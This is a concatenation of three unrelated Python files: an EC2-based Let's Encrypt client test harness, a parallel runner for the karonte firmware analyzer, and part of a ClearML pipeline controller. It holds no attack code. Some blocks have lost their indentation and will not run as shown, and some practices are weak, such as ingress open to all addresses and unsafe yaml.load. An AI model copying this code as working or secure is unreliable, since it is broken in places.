                    help='letsencrypt git repo to use')
# '~' is used below as the "not set" sentinel for --branch / --pull_request.
parser.add_argument('--branch',
                    default='~',
                    help='letsencrypt git branch to trial')
parser.add_argument('--pull_request',
                    default='~',
                    help='letsencrypt/letsencrypt pull request to trial')
parser.add_argument('--merge_master',
                    action='store_true',
                    help="if set merges PR into master branch of letsencrypt/letsencrypt")
parser.add_argument('--saveinstances',
                    action='store_true',
                    help="don't kill EC2 instances after run, useful for debugging")
parser.add_argument('--alt_pip',
                    default='',
                    help="server from which to pull candidate release packages")
cl_args = parser.parse_args()
# Credential Variables
#-------------------------------------------------------------------------------
# assumes naming: <key_filename> = <keyname>.pem
KEYFILE = cl_args.key_file
# e.g. 'dir/MyKeyPair.pem' -> 'MyKeyPair'
KEYNAME = os.path.split(cl_args.key_file)[1].split('.pem')[0]
PROFILE = cl_args.aws_profile
# Globals
#-------------------------------------------------------------------------------
BOULDER_AMI = 'ami-5f490b35' # premade shared boulder AMI 14.04LTS us-east-1
LOGDIR = "" #points to logging / working directory
# boto3/AWS api globals, initialized once the session is opened below.
AWS_SESSION = None
EC2 = None
# Boto3/AWS automation functions
#-------------------------------------------------------------------------------
def make_security_group():
# will fail if security group of GroupName already exists
# cannot have duplicate SGs of the same name
mysg = EC2.create_security_group(GroupName="letsencrypt_test",
Description='security group for automated testing')
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=22, ToPort=22)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=80, ToPort=80)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=443, ToPort=443)
# for boulder wfe (http) server
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=4000, ToPort=4000)
# for mosh
mysg.authorize_ingress(IpProtocol="udp", CidrIp="0.0.0.0/0", FromPort=60000, ToPort=61000)
return mysg
def make_instance(instance_name,
                  ami_id,
                  keyname,
                  machine_type='t2.micro',
                  security_groups=None,
                  userdata=""): #userdata contains bash or cloud-init script
    """Launch a single EC2 instance from ami_id, tag it with instance_name,
    and return the boto3 Instance object.

    security_groups defaults to ['letsencrypt_test']; the default is built
    inside the function instead of as a mutable default argument (behavior
    is unchanged for all existing callers).
    """
    if security_groups is None:
        security_groups = ['letsencrypt_test']
    new_instance = EC2.create_instances(
        ImageId=ami_id,
        SecurityGroups=security_groups,
        KeyName=keyname,
        MinCount=1,
        MaxCount=1,
        UserData=userdata,
        InstanceType=machine_type)[0]
    # brief pause to prevent rare error on EC2 delay, should block until ready instead
    time.sleep(1.0)
    # give instance a name
    new_instance.create_tags(Tags=[{'Key': 'Name', 'Value': instance_name}])
    return new_instance
def terminate_and_clean(instances):
    """
    Some AMIs specify EBS stores that won't delete on instance termination.
    These must be manually deleted after shutdown.

    Terminates every instance, waits for all of them to reach the
    'terminated' state, deletes the leftover volumes, and returns the list
    of deleted volume ids.
    """
    # Collect volumes that terminate() would otherwise orphan.
    volumes_to_delete = []
    for instance in instances:
        for bdmap in instance.block_device_mappings:
            if 'Ebs' in bdmap.keys():
                if not bdmap['Ebs']['DeleteOnTermination']:
                    volumes_to_delete.append(bdmap['Ebs']['VolumeId'])
    for instance in instances:
        instance.terminate()
    # can't delete volumes until all attaching instances are terminated
    _ids = [instance.id for instance in instances]
    all_terminated = False
    while not all_terminated:
        all_terminated = True
        for _id in _ids:
            # necessary to reinit object for boto3 to get true state
            inst = EC2.Instance(id=_id)
            if inst.state['Name'] != 'terminated':
                all_terminated = False
        time.sleep(5)
    for vol_id in volumes_to_delete:
        volume = EC2.Volume(id=vol_id)
        volume.delete()
    return volumes_to_delete
# Helper Routines
#-------------------------------------------------------------------------------
def block_until_http_ready(urlstring, wait_time=10, timeout=240):
    "Blocks until server at urlstring can respond to http requests"
    server_ready = False
    t_elapsed = 0
    while not server_ready and t_elapsed < timeout:
        try:
            # Progress dots on stdout while polling.
            sys.stdout.write('.')
            sys.stdout.flush()
            req = urllib2.Request(urlstring)
            response = urllib2.urlopen(req)
            #if response.code == 200:
            server_ready = True
        except urllib2.URLError:
            pass
        # NOTE(review): sleeps once more even after a successful response,
        # and returns silently on timeout without signaling failure --
        # confirm both are acceptable to callers.
        time.sleep(wait_time)
        t_elapsed += wait_time
def block_until_ssh_open(ipstring, wait_time=10, timeout=120):
    """Blocks until server at ipstring has an open port 22.

    Polls every wait_time seconds, giving up silently after timeout seconds
    (matching the original behavior of returning None either way).
    """
    reached = False
    t_elapsed = 0
    while not reached and t_elapsed < timeout:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect((ipstring, 22))
            reached = True
        except socket.error:
            time.sleep(wait_time)
            t_elapsed += wait_time
        finally:
            # Close every attempt's socket; the original only closed the
            # last one and leaked one descriptor per failed connect.
            sock.close()
def block_until_instance_ready(booting_instance, wait_time=5, extra_wait_time=20):
    "Blocks booting_instance until AWS EC2 instance is ready to accept SSH connections"
    # the reinstantiation from id is necessary to force boto3
    # to correctly update the 'state' variable during init
    _id = booting_instance.id
    _instance = EC2.Instance(id=_id)
    _state = _instance.state['Name']
    _ip = _instance.public_ip_address
    # Poll until the instance is running AND has a public IP assigned.
    while _state != 'running' or _ip is None:
        time.sleep(wait_time)
        _instance = EC2.Instance(id=_id)
        _state = _instance.state['Name']
        _ip = _instance.public_ip_address
    block_until_ssh_open(_ip)
    # Extra settling time: sshd may accept TCP before logins actually work.
    time.sleep(extra_wait_time)
    return _instance
# Fabric Routines
#-------------------------------------------------------------------------------
def local_git_clone(repo_url):
    "clones master of repo_url"
    with lcd(LOGDIR):
        # Start from a clean checkout, then pack it for upload to instances.
        local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
        local('git clone %s'% repo_url)
        local('tar czf le.tar.gz letsencrypt')
def local_git_branch(repo_url, branch_name):
    "clones branch <branch_name> of repo_url"
    with lcd(LOGDIR):
        # Clean checkout of just the requested branch, then pack for upload.
        local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
        local('git clone %s --branch %s --single-branch'%(repo_url, branch_name))
        local('tar czf le.tar.gz letsencrypt')
def local_git_PR(repo_url, PRnumstr, merge_master=True):
    "clones specified pull request from repo_url and optionally merges into master"
    with lcd(LOGDIR):
        local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
        local('git clone %s'% repo_url)
        # Fetch the PR head into a local branch and check it out.
        local('cd letsencrypt && git fetch origin pull/%s/head:lePRtest'%PRnumstr)
        local('cd letsencrypt && git co lePRtest')
        if merge_master:
            local('cd letsencrypt && git remote update origin')
            local('cd letsencrypt && git merge origin/master -m "testmerge"')
        local('tar czf le.tar.gz letsencrypt')
def local_repo_to_remote():
    "copies local tarball of repo to remote"
    with lcd(LOGDIR):
        # Upload to the remote user's home directory and unpack there.
        put(local_path='le.tar.gz', remote_path='')
        run('tar xzf le.tar.gz')
def local_repo_clean():
    "delete tarball"
    with lcd(LOGDIR):
        local('rm le.tar.gz')
def deploy_script(scriptpath, *args):
    """Upload the local script at scriptpath to the remote host (preserving
    its executable mode) and run it there with the given arguments."""
    put(local_path=scriptpath, remote_path='', mirror_local_mode=True)
    script_name = os.path.split(scriptpath)[1]
    run('./{0} {1}'.format(script_name, ' '.join(args)))
def run_boulder():
    """Start the boulder CA on the remote host, detached from the session."""
    with cd('$GOPATH/src/github.com/letsencrypt/boulder'):
        run('go run cmd/rabbitmq-setup/main.go -server amqp://localhost')
        # nohup + redirected fds so boulder keeps running after ssh exits.
        run('nohup ./start.py >& /dev/null < /dev/null &')
def config_and_launch_boulder(instance):
    """Configure and launch boulder on the current fabric host.

    The `instance` argument is not referenced in this body.
    """
    execute(deploy_script, 'scripts/boulder_config.sh')
    execute(run_boulder)
def install_and_launch_letsencrypt(instance, boulder_url, target):
    """Upload the repo tarball to `instance` and run the test script with the
    environment variables the test scripts expect."""
    execute(local_repo_to_remote)
    with shell_env(BOULDER_URL=boulder_url,
                   PUBLIC_IP=instance.public_ip_address,
                   PRIVATE_IP=instance.private_ip_address,
                   PUBLIC_HOSTNAME=instance.public_dns_name,
                   PIP_EXTRA_INDEX_URL=cl_args.alt_pip,
                   OS_TYPE=target['type']):
        execute(deploy_script, cl_args.test_script)
def grab_letsencrypt_log():
    "grabs letsencrypt.log via cat into logged stdout"
    sudo('if [ -f /var/log/letsencrypt/letsencrypt.log ]; then \
    cat /var/log/letsencrypt/letsencrypt.log; else echo "[novarlog]"; fi')
    # fallback file if /var/log is unwriteable...? correct?
    sudo('if [ -f ./letsencrypt.log ]; then \
    cat ./letsencrypt.log; else echo "[nolocallog]"; fi')
#-------------------------------------------------------------------------------
# SCRIPT BEGINS
#-------------------------------------------------------------------------------
# Fabric library controlled through global env parameters
env.key_filename = KEYFILE
env.shell = '/bin/bash -l -i -c'
env.connection_attempts = 5
env.timeout = 10
# replace default SystemExit thrown by fabric during trouble
class FabricException(Exception):
    pass
env['abort_exception'] = FabricException
# Set up local copy of git repo
#-------------------------------------------------------------------------------
LOGDIR = "letest-%d"%int(time.time())
print("Making local dir for test repo and logs: %s"%LOGDIR)
local('mkdir %s'%LOGDIR)
# figure out what git object to test and locally create it in LOGDIR
# ('~' is the "not given" sentinel default for --pull_request / --branch)
print("Making local git repo")
try:
    if cl_args.pull_request != '~':
        print('Testing PR %s '%cl_args.pull_request,
              "MERGING into master" if cl_args.merge_master else "")
        execute(local_git_PR, cl_args.repo, cl_args.pull_request, cl_args.merge_master)
    elif cl_args.branch != '~':
        print('Testing branch %s of %s'%(cl_args.branch, cl_args.repo))
        execute(local_git_branch, cl_args.repo, cl_args.branch)
    else:
        print('Testing master of %s'%cl_args.repo)
        execute(local_git_clone, cl_args.repo)
except FabricException:
    print("FAIL: trouble with git repo")
    exit()
# Set up EC2 instances
#-------------------------------------------------------------------------------
# NOTE(review): yaml.load without an explicit Loader executes arbitrary tags;
# fine for a trusted local config file, but yaml.safe_load would be safer.
configdata = yaml.load(open(cl_args.config_file, 'r'))
targetlist = configdata['targets']
print('Testing against these images: [%d total]'%len(targetlist))
for target in targetlist:
    print(target['ami'], target['name'])
print("Connecting to EC2 using\n profile %s\n keyname %s\n keyfile %s"%(PROFILE, KEYNAME, KEYFILE))
AWS_SESSION = boto3.session.Session(profile_name=PROFILE)
EC2 = AWS_SESSION.resource('ec2')
print("Making Security Group")
# Create the shared security group only if it does not already exist.
sg_exists = False
for sg in EC2.security_groups.all():
    if sg.group_name == 'letsencrypt_test':
        sg_exists = True
        print(" %s already exists"%'letsencrypt_test')
if not sg_exists:
    make_security_group()
    # Give AWS time to propagate the new group before launching into it.
    time.sleep(30)
print("Requesting Instances...")
boulder_server = make_instance('le-boulderserver',
                               BOULDER_AMI,
                               KEYNAME,
                               #machine_type='t2.micro',
                               machine_type='t2.medium',
                               security_groups=['letsencrypt_test'])
instances = []
for target in targetlist:
    # t2 instances require HVM virtualization; paravirtual AMIs use t1.
    if target['virt'] == 'hvm':
        machine_type = 't2.micro'
    else:
        machine_type = 't1.micro'
    if 'userdata' in target.keys():
        userdata = target['userdata']
    else:
        userdata = ''
    instances.append(make_instance('le-%s'%target['name'],
                                   target['ami'],
                                   KEYNAME,
                                   machine_type=machine_type,
                                   userdata=userdata))
# Configure and launch boulder server
#-------------------------------------------------------------------------------
print("Waiting on Boulder Server")
boulder_server = block_until_instance_ready(boulder_server)
print(" server %s"%boulder_server)
print("Configuring and Launching Boulder")
# env.host_string defines the ssh user and host for connection
env.host_string = "ubuntu@%s"%boulder_server.public_ip_address
print("Boulder Server at (SSH):", env.host_string)
config_and_launch_boulder(boulder_server)
# blocking often unnecessary, but cheap EC2 VMs can get very slow
block_until_http_ready('http://%s:4000'%boulder_server.public_ip_address,
                       wait_time=10,
                       timeout=500)
# Clients inside EC2 reach boulder over its private address.
boulder_url = "http://%s:4000/directory"%boulder_server.private_ip_address
print("Boulder Server at (public ip): http://%s:4000/directory"%boulder_server.public_ip_address)
print("Boulder Server at (EC2 private ip): %s"%boulder_url)
# Install and launch client scripts in parallel
#-------------------------------------------------------------------------------
print("Uploading and running test script in parallel: %s"%cl_args.test_script)
print("Output routed to log files in %s"%LOGDIR)
# (Advice: always use Manager.Queue, never regular multiprocessing.Queue
# the latter has implementation flaws that deadlock it in some circumstances)
manager = Manager()
outqueue = manager.Queue()
inqueue = manager.Queue()
SENTINEL = None #queue kill signal
# launch as many processes as clients to test
num_processes = len(targetlist)
jobs = [] #keep a reference to current procs
def test_client_process(inqueue, outqueue):
    """Worker: pull (index, target) jobs from inqueue until SENTINEL, run the
    test script against that instance, and push (index, target,
    'pass'|'fail') results onto outqueue."""
    cur_proc = mp.current_process()
    for inreq in iter(inqueue.get, SENTINEL):
        ii, target = inreq
        #save all stdout to log file
        # NOTE(review): stdout is rebound per job and the previous log file is
        # never closed/restored; handles leak until the process exits.
        sys.stdout = open(LOGDIR+'/'+'%d_%s.log'%(ii,target['name']), 'w')
        print("[%s : client %d %s %s]" % (cur_proc.name, ii, target['ami'], target['name']))
        instances[ii] = block_until_instance_ready(instances[ii])
        print("server %s at %s"%(instances[ii], instances[ii].public_ip_address))
        # Point fabric at this client machine.
        env.host_string = "%s@%s"%(target['user'], instances[ii].public_ip_address)
        print(env.host_string)
        try:
            install_and_launch_letsencrypt(instances[ii], boulder_url, target)
            outqueue.put((ii, target, 'pass'))
            print("%s - %s SUCCESS"%(target['ami'], target['name']))
        except:
            # Any failure marks this target failed; details live in its log.
            outqueue.put((ii, target, 'fail'))
            print("%s - %s FAIL"%(target['ami'], target['name']))
            pass
        # append server letsencrypt.log to each per-machine output log
        print("\n\nletsencrypt.log\n" + "-"*80 + "\n")
        try:
            execute(grab_letsencrypt_log)
        except:
            print("log fail\n")
            pass
# initiate process execution
for i in range(num_processes):
    p = mp.Process(target=test_client_process, args=(inqueue, outqueue))
    jobs.append(p)
    p.daemon = True  # kills subprocesses if parent is killed
    p.start()
# fill up work queue
for ii, target in enumerate(targetlist):
    inqueue.put((ii, target))
# add SENTINELs to end client processes
for i in range(num_processes):
    inqueue.put(SENTINEL)
# wait on termination of client processes
for p in jobs:
    p.join()
# add SENTINEL to output queue
outqueue.put(SENTINEL)
# clean up
execute(local_repo_clean)
# print and save summary results
results_file = open(LOGDIR+'/results', 'w')
# Drain the output queue and report per-target results in index order.
outputs = [outq for outq in iter(outqueue.get, SENTINEL)]
outputs.sort(key=lambda x: x[0])
for outq in outputs:
    ii, target, status = outq
    print('%d %s %s'%(ii, target['name'], status))
    results_file.write('%d %s %s\n'%(ii, target['name'], status))
results_file.close()
if not cl_args.saveinstances:
    print('Logs in ', LOGDIR)
    print('Terminating EC2 Instances and Cleaning Dangling EBS Volumes')
    boulder_server.terminate()
    terminate_and_clean(instances)
else:
    # print login information for the boxes for debugging
    for ii, target in enumerate(targetlist):
        print(target['name'],
              target['ami'],
              "%s@%s"%(target['user'], instances[ii].public_ip_address))
# kill any connections
fabric.network.disconnect_all()
|
run.py | # HELP:
# Run karonte on a set of firmware sample and store the results in ./eval/karonte_stats/results/<vendor>
import os
import sys
import subprocess as sp
from optparse import OptionParser
from optparse import Option, OptionValueError
import threading
import time
# Directory where per-vendor karonte logs/results are written.
RESULTS = './eval/karonte_stats/results/'
class MultipleOption(Option):
    """optparse Option subclass adding an 'extend' action that collects every
    occurrence of a repeated option into a list."""
    ACTIONS = Option.ACTIONS + ("extend",)
    STORE_ACTIONS = Option.STORE_ACTIONS + ("extend",)
    TYPED_ACTIONS = Option.TYPED_ACTIONS + ("extend",)
    ALWAYS_TYPED_ACTIONS = Option.ALWAYS_TYPED_ACTIONS + ("extend",)

    def take_action(self, action, dest, opt, value, values, parser):
        if action == "extend":
            # Append this occurrence to the destination list, creating it on
            # first use.
            values.ensure_value(dest, []).append(value)
        else:
            Option.take_action(self, action, dest, opt, value, values, parser)
class KaronteStats:
    """Runs karonte over every firmware config of the selected vendors, with
    at most N analyses in flight at a time."""

    def __init__(self):
        # Number of parallel runs; overridden by -n.
        self.N = 1
        # Default vendor directories under ./config to process.
        self.vendors = ['tenda', 'netgear', 'tp_link', 'd-link', 'lk', 'huawei', 'mediatek']

    def parse_options(self):
        """Parse -n (parallelism) and -v (vendor list) into self.N and
        self.vendors, falling back to the defaults when absent."""
        parser = OptionParser(option_class=MultipleOption, description="Run karonte on a set of firmware sample and store the"
                              " results in ./eval/karonte_stats/results/<vendor>",
                              usage="%prog -n parallel_runs -v vendor",
                              version="%prog 1.0")
        parser.add_option("-v", "--vendors",
                          action="extend", metavar='CATEGORIES',
                          help="tenda, netgear, tp-link, d-link, lk, huawei, mediatek")
        parser.add_option("-n", "--n",
                          action="extend", metavar='CATEGORIES',
                          help="Number of parallel runs", )
        (options, args) = parser.parse_args()
        if options.n:
            self.N = int(options.n[0])
        self.vendors = options.vendors
        if not self.N or self.N == 0:
            self.N = 1
        if not self.vendors:
            self.vendors = ['tenda', 'netgear', 'tp_link', 'd-link', 'lk', 'huawei', 'mediatek']
        self.vendors = [x.lower() for x in self.vendors]

    def run_fw(self, config_file, log_path):
        """Run karonte on one firmware config, writing its log to log_path.
        NOTE(review): paths are interpolated into a shell command -- safe only
        for trusted local filenames."""
        os.system('python tool/karonte.py ' + config_file + ' ' + log_path)

    def run(self):
        """Walk ./config/<vendor>/ and analyze each config file, keeping up to
        self.N analysis threads alive concurrently."""
        self.parse_options()
        # Paths below are relative to the repository root, two levels up.
        os.chdir('../../')
        pool = [None] * self.N
        # i counts free pool slots; free_pos holds their indices.
        i = self.N
        free_pos = [x for x in xrange(self.N)]
        if not os.path.exists(RESULTS):
            os.makedirs(RESULTS)
        for d in os.listdir('config'):
            if d.lower() not in self.vendors:
                continue
            if not os.path.exists(RESULTS + '/' + d):
                os.makedirs(RESULTS + '/' + d)
            for f in os.listdir('config/' + d + '/'):
                config_file = 'config/' + d + '/' + f
                log_file = RESULTS + '/' + d + '/' + f
                pos = free_pos[0]
                free_pos = free_pos[1:]
                pool[pos] = threading.Thread(target=self.run_fw, args=(config_file, log_file))
                pool[pos].start()
                i -= 1
                # Pool full: poll until at least one thread finishes.
                # NOTE(review): a slot that stays dead across two passes can be
                # appended to free_pos twice, double-booking it -- confirm.
                while i == 0:
                    alive = [x.is_alive() for x in pool]
                    free_pos += [x for x, y in enumerate(alive) if not y]
                    i += len([x for x in alive if not x])
                    time.sleep(1)
        # wait for them to finish
        print "Waiting... "
        [x.join() for x in pool if x]
# Script entry point.
if __name__ == '__main__':
    KaronteStats().run()
|
controller.py | import atexit
import functools
import inspect
import json
import os
import re
from copy import copy, deepcopy
from datetime import datetime
from logging import getLogger
from multiprocessing import Process, Queue
from threading import Thread, Event, RLock
from time import time
from typing import Sequence, Optional, Mapping, Callable, Any, List, Dict, Union, Tuple
from attr import attrib, attrs
from pathlib2 import Path
from .job import LocalClearmlJob, RunningJob
from .. import Logger
from ..automation import ClearmlJob
from ..backend_interface.task.populate import CreateFromFunction
from ..backend_interface.util import get_or_create_project, exact_match_regex
from ..debugging.log import LoggerRoot
from ..model import BaseModel, OutputModel
from ..task import Task
from ..utilities.proxy_object import LazyEvalWrapper, flatten_dictionary
class PipelineController(object):
"""
Pipeline controller.
Pipeline is a DAG of base tasks, each task will be cloned (arguments changed as required), executed, and monitored.
The pipeline process (task) itself can be executed manually or by the clearml-agent services queue.
Notice: The pipeline controller lives as long as the pipeline itself is being executed.
"""
_tag = 'pipeline'
_node_tag_prefix = 'pipe:'
_step_pattern = r"\${[^}]*}"
_config_section = 'Pipeline'
_args_section = 'Args'
_pipeline_step_ref = 'pipeline'
_runtime_property_hash = '_pipeline_hash'
_reserved_pipeline_names = (_pipeline_step_ref, )
_task_project_lookup = {}
_clearml_job_class = ClearmlJob
_update_execution_plot_interval = 5.*60
_monitor_node_interval = 5.*60
_report_plot_execution_flow = dict(title='Pipeline', series='Execution Flow')
_report_plot_execution_details = dict(title='Pipeline Details', series='Execution Details')
@attrs
class Node(object):
name = attrib(type=str) # pipeline step name
base_task_id = attrib(type=str, default=None) # base Task ID to be cloned and launched
task_factory_func = attrib(type=Callable, default=None) # alternative to base_task_id, function creating a Task
queue = attrib(type=str, default=None) # execution queue name to use
parents = attrib(type=list, default=[]) # list of parent DAG steps
timeout = attrib(type=float, default=None) # execution timeout limit
parameters = attrib(type=dict, default={}) # Task hyper parameters to change
configurations = attrib(type=dict, default={}) # Task configuration objects to change
task_overrides = attrib(type=dict, default={}) # Task overrides to change
executed = attrib(type=str, default=None) # The actual executed Task ID (None if not executed yet)
clone_task = attrib(type=bool, default=True) # If True cline the base_task_id, then execute the cloned Task
job = attrib(type=ClearmlJob, default=None) # ClearMLJob object
skip_job = attrib(type=bool, default=False) # if True, this step should be skipped
continue_on_fail = attrib(type=bool, default=False) # if True, the pipeline continues even if the step failed
cache_executed_step = attrib(type=bool, default=False) # if True this pipeline step should be cached
return_artifacts = attrib(type=list, default=[]) # List of artifact names returned by the step
monitor_metrics = attrib(type=list, default=[]) # List of metric title/series to monitor
monitor_artifacts = attrib(type=list, default=[]) # List of artifact names to monitor
monitor_models = attrib(type=list, default=[]) # List of models to monitor
def copy(self):
# type: () -> PipelineController.Node
"""
return a copy of the current Node, excluding the `job`, `executed`, fields
:return: new Node copy
"""
new_copy = PipelineController.Node(
name=self.name,
**dict((k, deepcopy(v)) for k, v in self.__dict__.items()
if k not in ('name', 'job', 'executed', 'task_factory_func'))
)
new_copy.task_factory_func = self.task_factory_func
return new_copy
    def __init__(
            self,
            name,  # type: str
            project,  # type: str
            version,  # type: str
            pool_frequency=0.2,  # type: float
            add_pipeline_tags=False,  # type: bool
            target_project=None,  # type: Optional[str]
            auto_version_bump=True,  # type: bool
            abort_on_failure=False,  # type: bool
    ):
        # type: (...) -> None
        """
        Create a new pipeline controller. The newly created object will launch and monitor the new experiments.
        :param name: Provide pipeline name (if main Task exists it overrides its name)
        :param project: Provide project storing the pipeline (if main Task exists it overrides its project)
        :param version: Must provide pipeline version. This version allows to uniquely identify the pipeline
            template execution. Examples for semantic versions: version='1.0.1' , version='23', version='1.2'
        :param float pool_frequency: The pooling frequency (in minutes) for monitoring experiments / states.
        :param bool add_pipeline_tags: (default: False) if True, add `pipe: <pipeline_task_id>` tag to all
            steps (Tasks) created by this pipeline.
        :param str target_project: If provided, all pipeline steps are cloned into the target project
        :param bool auto_version_bump: If True (default), if the same pipeline version already exists
            (with any difference from the current one), the current pipeline version will be bumped to a new version
            version bump examples: 1.0.0 -> 1.0.1 , 1.2 -> 1.3, 10 -> 11 etc.
        :param bool abort_on_failure: If False (default), failed pipeline steps will not cause the pipeline
            to stop immediately, instead any step that is not connected (or indirectly connected) to the failed step,
            will still be executed. Nonetheless the pipeline itself will be marked failed, unless the failed step
            was specifically defined with "continue_on_fail=True".
            If True, any failed step will cause the pipeline to immediately abort, stop all running steps,
            and mark the pipeline as failed.
        """
        self._nodes = {}  # step name -> PipelineController.Node (the DAG)
        self._running_nodes = []  # names of steps currently executing
        self._start_time = None  # set once the pipeline starts running
        self._pipeline_time_limit = None  # seconds; set via set_pipeline_execution_time_limit()
        self._default_execution_queue = None  # set via set_default_execution_queue()
        self._version = str(version).strip()
        # enforce a dotted-numeric version string, e.g. '1.0.1', '1.2' or '23'
        if not self._version or not all(i and i.isnumeric() for i in self._version.split('.')):
            raise ValueError(
                "Pipeline version has to be in a semantic version form, "
                "examples: version='1.0.1', version='1.2', version='23'")
        self._pool_frequency = pool_frequency * 60.  # minutes -> seconds
        self._thread = None  # presumably the background thread driving the pipeline - created later
        self._pipeline_args = dict()  # pipeline parameter values (see `add_parameter` mentioned in add_step docs)
        self._pipeline_args_desc = dict()  # pipeline parameter descriptions
        self._stop_event = None  # presumably a threading Event used to request a stop - created later
        self._experiment_created_cb = None
        self._experiment_completed_cb = None
        self._pre_step_callbacks = {}  # step name -> pre-execute callback
        self._post_step_callbacks = {}  # step name -> post-execute callback
        self._target_project = target_project or ''
        self._add_pipeline_tags = add_pipeline_tags
        # reuse the Task of the current process if one exists; otherwise one is created below
        self._task = Task.current_task()
        self._step_ref_pattern = re.compile(self._step_pattern)
        self._reporting_lock = RLock()  # serializes execution-plot reporting
        self._pipeline_task_status_failed = None
        self._auto_version_bump = bool(auto_version_bump)
        self._mock_execution = False  # used for nested pipelines (eager execution)
        if not self._task:
            # no Task in the current process - create the pipeline controller Task
            self._task = Task.init(
                project_name=project or 'Pipelines',
                task_name=name or 'Pipeline {}'.format(datetime.now()),
                task_type=Task.TaskTypes.controller,
                auto_resource_monitoring=False,
                reuse_last_task_id=False
            )
            # mark the newly created Task as a pipeline (system tag) and record the version
            self._task.set_system_tags((self._task.get_system_tags() or []) + [self._tag])
            self._task.set_user_properties(version=self._version)
        self._auto_connect_task = bool(self._task)
        # make sure we add to the main Task the pipeline tag
        if self._task:
            self._task.add_tags([self._tag])
        self._monitored_nodes = {}  # type: Dict[str, dict]
        self._abort_running_steps_on_failure = abort_on_failure
def set_default_execution_queue(self, default_execution_queue):
# type: (Optional[str]) -> None
"""
Set the default execution queue if pipeline step does not specify an execution queue
:param default_execution_queue: The execution queue to use if no execution queue is provided
"""
self._default_execution_queue = str(default_execution_queue) if default_execution_queue else None
def set_pipeline_execution_time_limit(self, max_execution_minutes):
# type: (Optional[float]) -> None
"""
Set maximum execution time (minutes) for the entire pipeline. Pass None or 0 to disable execution time limit.
:param float max_execution_minutes: The maximum time (minutes) for the entire pipeline process. The
default is ``None``, indicating no time limit.
"""
self._pipeline_time_limit = max_execution_minutes * 60. if max_execution_minutes else None
def add_step(
self,
name, # type: str
base_task_id=None, # type: Optional[str]
parents=None, # type: Optional[Sequence[str]]
parameter_override=None, # type: Optional[Mapping[str, Any]]
configuration_overrides=None, # type: Optional[Mapping[str, Union[str, Mapping]]]
task_overrides=None, # type: Optional[Mapping[str, Any]]
execution_queue=None, # type: Optional[str]
monitor_metrics=None, # type: Optional[List[Union[Tuple[str, str], Tuple[(str, str), (str, str)]]]]
monitor_artifacts=None, # type: Optional[List[Union[str, Tuple[str, str]]]]
monitor_models=None, # type: Optional[List[Union[str, Tuple[str, str]]]]
time_limit=None, # type: Optional[float]
base_task_project=None, # type: Optional[str]
base_task_name=None, # type: Optional[str]
clone_base_task=True, # type: bool
continue_on_fail=False, # type: bool
pre_execute_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node, dict], bool]] # noqa
post_execute_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node], None]] # noqa
cache_executed_step=False, # type: bool
base_task_factory=None, # type: Optional[Callable[[PipelineController.Node], Task]]
):
# type: (...) -> bool
"""
Add a step to the pipeline execution DAG.
Each step must have a unique name (this name will later be used to address the step)
:param name: Unique of the step. For example `stage1`
:param base_task_id: The Task ID to use for the step. Each time the step is executed,
the base Task is cloned, then the cloned task will be sent for execution.
:param parents: Optional list of parent nodes in the DAG.
The current step in the pipeline will be sent for execution only after all the parent nodes
have been executed successfully.
:param parameter_override: Optional parameter overriding dictionary.
The dict values can reference a previously executed step using the following form '${step_name}'
Examples:
- Artifact access
parameter_override={'Args/input_file': '${<step_name>.artifacts.<artifact_name>.url}' }
- Model access (last model used)
parameter_override={'Args/input_file': '${<step_name>.models.output.-1.url}' }
- Parameter access
parameter_override={'Args/input_file': '${<step_name>.parameters.Args/input_file}' }
- Pipeline Task argument (see `Pipeline.add_parameter`)
parameter_override={'Args/input_file': '${pipeline.<pipeline_parameter>}' }
- Task ID
parameter_override={'Args/input_file': '${stage3.id}' }
:param configuration_overrides: Optional, override Task configuration objects.
Expected dictionary of configuration object name and configuration object content.
Examples:
{'General': dict(key='value')}
{'General': 'configuration file content'}
{'OmegaConf': YAML.dumps(full_hydra_dict)}
:param task_overrides: Optional task section overriding dictionary.
The dict values can reference a previously executed step using the following form '${step_name}'
Examples:
- get the latest commit from a specific branch
task_overrides={'script.version_num': '', 'script.branch': 'main'}
- match git repository branch to a previous step
task_overrides={'script.branch': '${stage1.script.branch}', 'script.version_num': ''}
- change container image
task_overrides={'container.image': '${stage1.container.image}'}
- match container image to a previous step
task_overrides={'container.image': '${stage1.container.image}'}
:param execution_queue: Optional, the queue to use for executing this specific step.
If not provided, the task will be sent to the default execution queue, as defined on the class
:param monitor_metrics: Optional, log the step's metrics on the pipeline Task.
Format is a list of pairs metric (title, series) to log:
[(step_metric_title, step_metric_series), ]
Example: [('test', 'accuracy'), ]
Or a list of tuple pairs, to specify a different target metric for to use on the pipeline Task:
[((step_metric_title, step_metric_series), (target_metric_title, target_metric_series)), ]
Example: [[('test', 'accuracy'), ('model', 'accuracy')], ]
:param monitor_artifacts: Optional, log the step's artifacts on the pipeline Task.
Provided a list of artifact names existing on the step's Task, they will also appear on the Pipeline itself.
Example: [('processed_data', 'final_processed_data'), ]
Alternatively user can also provide a list of artifacts to monitor
(target artifact name will be the same as original artifact name)
Example: ['processed_data', ]
:param monitor_models: Optional, log the step's output models on the pipeline Task.
Provided a list of model names existing on the step's Task, they will also appear on the Pipeline itself.
Example: [('model_weights', 'final_model_weights'), ]
Alternatively user can also provide a list of models to monitor
(target models name will be the same as original model)
Example: ['model_weights', ]
To select the latest (lexicographic) model use "model_*", or the last created model with just "*"
Example: ['model_weights_*', ]
:param time_limit: Default None, no time limit.
Step execution time limit, if exceeded the Task is aborted and the pipeline is stopped and marked failed.
:param base_task_project: If base_task_id is not given,
use the base_task_project and base_task_name combination to retrieve the base_task_id to use for the step.
:param base_task_name: If base_task_id is not given,
use the base_task_project and base_task_name combination to retrieve the base_task_id to use for the step.
:param clone_base_task: If True (default) the pipeline will clone the base task, and modify/enqueue
the cloned Task. If False, the base-task is used directly, notice it has to be in draft-mode (created).
:param continue_on_fail: (default False). If True, failed step will not cause the pipeline to stop
